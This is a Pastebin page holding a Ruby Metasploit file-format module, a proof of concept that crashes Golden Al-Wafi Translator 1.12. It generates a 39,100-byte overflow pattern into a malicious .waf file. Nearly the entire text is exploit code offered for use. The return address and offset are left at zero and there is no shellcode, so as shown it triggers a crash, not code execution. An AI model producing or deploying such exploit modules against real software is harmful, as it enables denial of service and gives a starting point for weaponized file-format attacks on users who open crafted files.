Advertisement
MrAaMa

Golden Al-Wafi Translator 1.12 (.waf) Local Crash PoC

Sep 24th, 2012
157
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Ruby 1.84 KB | None | 0 0
  1. ## Metasploit To Max
  2. #   http://metasploit.com/framework/
  3. ##
  4.  
  5. require 'msf/core'
  6.  
  7. class Metasploit3 < Msf::Exploit::Remote
  8.     Rank = NormalRanking
  9.     include Msf::Exploit::FILEFORMAT
  10.  
  11.     def initialize(info = {})
  12.         super(update_info(info,
  13.             'Name'        => 'Golden Al-Wafi Translator 1.12 (.waf) Local Crash PoC',
  14.             'Description'    => %q{
  15.                     Golden Al-Wafi Translator 1.12 (.waf) Local Crash PoC
  16.             },
  17.             'License'        => MSF_LICENSE,
  18.             'Author'        =>
  19.                 [
  20.                     'original discovery :DaOne',    
  21.                     'Anti-Trust (ninja-sec.org)',    
  22.                 ],
  23.             'References'    =>
  24.                 [
  25.                     [ 'OSVDB', '' ],
  26.                     [ 'CVE', '' ],
  27.                     [ 'URL', 'http://1337day.com/exploits/19435' ]
  28.                 ],
  29.             'DefaultOptions' =>
  30.                 {
  31.                     'ExitFunction' => 'process',
  32.                 },
  33.             'Platform'    => 'win',
  34.             'Payload'    =>
  35.                 {
  36.                     'BadChars' => "",
  37.                     'DisableNops' => true,
  38.                 },
  39.  
  40.             'Targets'        =>
  41.                 [
  42.                     [ 'Windows XP SP3',
  43.                         {
  44.                             'Ret'       =>    0x00000000,
  45.                             'Offset'    =>    0
  46.                         }
  47.                     ],
  48.                 ],
  49.             'Privileged'    => false,
  50.             'DisclosureDate'    => '',
  51.             'DefaultTarget'    => 0))
  52.  
  53.         register_options([OptString.new('FILENAME', [ false, 'The file name.', 'ninja.waf']),], self.class)
  54.  
  55.     end
  56.  
  57.     def exploit
  58.  
  59.         buffer = Rex::Text.pattern_create(39100)
  60.  
  61.         file_create(buffer)
  62.  
  63.     end
  64. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement